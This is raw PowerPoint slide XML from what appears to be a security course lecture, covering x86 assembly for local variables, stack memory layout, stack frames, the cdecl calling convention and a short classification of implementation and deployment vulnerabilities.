            <a:ext cx="5832763" cy="475615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a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a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 – 0xc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>b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accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>– 0x8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>c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accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>– 0x4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sub $0x10,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0xa,-0xc(</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a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0x64,-0x8(</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a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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$0x41273333,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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%eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,-0x4(</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a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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-0x8(</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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,-0xc(</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2038120" y="1579420"/>
            <a:ext cx="3074208" cy="4226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a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a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tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>+ A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>b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accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>+ B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>c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solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>+ C</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="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+A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>] = 10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="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+B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>] = 100</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="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+C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>] = 10.45</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="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+A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>] = 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+A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>] + 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a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>+B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1367966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56</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51375" y="18631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478779" y="531369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478779" y="5704802"/>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10639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2" grpId="0"/>
      <p:bldP spid="13" grpId="0" animBg="1"/>
      <p:bldP spid="14" grpId="0" animBg="1"/>
      <p:bldP spid="1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57</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6776" y="21357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4712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58</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51375" y="21357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788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59</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4101" y="240796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825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Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These vulnerabilities are introduced because the application is not able to correctly handle unexpected events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unexpected input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unexpected errors/exceptions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unexpected interleaving of events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unfiltered output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="124488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60</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4101" y="240796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51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4662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endParaRPr lang="en-US">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6739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78935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62</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6739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60300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63</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97222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1519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64</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97222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37396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65</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23671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3038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66</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23671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4730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67</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7" y="35057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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="140696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68</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0x64</a:t>
                      </a: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7" y="35057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
        <p:nvSpPr>
          <p:cNvPr id="22" name="Right Arrow 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1202360" y="2051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15960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0xa</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69</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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x64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7861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547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Deployment Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These vulnerabilities are introduced by an incorrect/faulty deployment/configuration of the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An application is installed with more privileges than the ones it should have</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An application is installed on a system that has a faulty security policy and/or mechanism (e.g., a file that should be read-only is actually writeable)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An application is configured with easy-to-guess default credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If correctly deployed, the application would be (more) secure </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="194872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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x6E</a:t>
                      </a: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70</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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x64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7861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26292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a:t>
            </a:r>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is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>…</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0x41273333</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x64</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x6E</a:t>
                      </a:r>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0x10000</a:t>
            </a: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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x64</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0xFFF0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x10000</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>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9550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0xFFFC</a:t>
            </a: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0xFFF8</a:t>
            </a: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0xFFF4</a:t>
            </a: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0xFFF0</a:t>
            </a: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c</a:t>
            </a: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b</a:t>
            </a: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a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a: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06078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Frames</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allows us to allocate memory for the function's local variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, when considering calling a function, what other information do we need?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Return value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Our frame pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Return address (where to start program execution when function returns)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Local variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Temporary variables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12402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Calling Convention</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All of the previous information must be stored on the stack in order to call the function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Who should store that information?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Caller?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Thus, we need to define a convention of who pushes/stores what values on the stack to call a function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Varies based on processor, operating system, compiler, or type of call</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="148760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x86 Linux Calling Convention (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cdecl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Caller (in this order)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pushes arguments onto the stack (in right to left order)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pushes address of instruction after call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Callee</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pushes previous frame pointer onto stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Creates space on stack for local variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ensures that stack is consistent on return</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Return value in %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> register</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74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="125337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4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>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callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">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b</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return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> a + b + 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
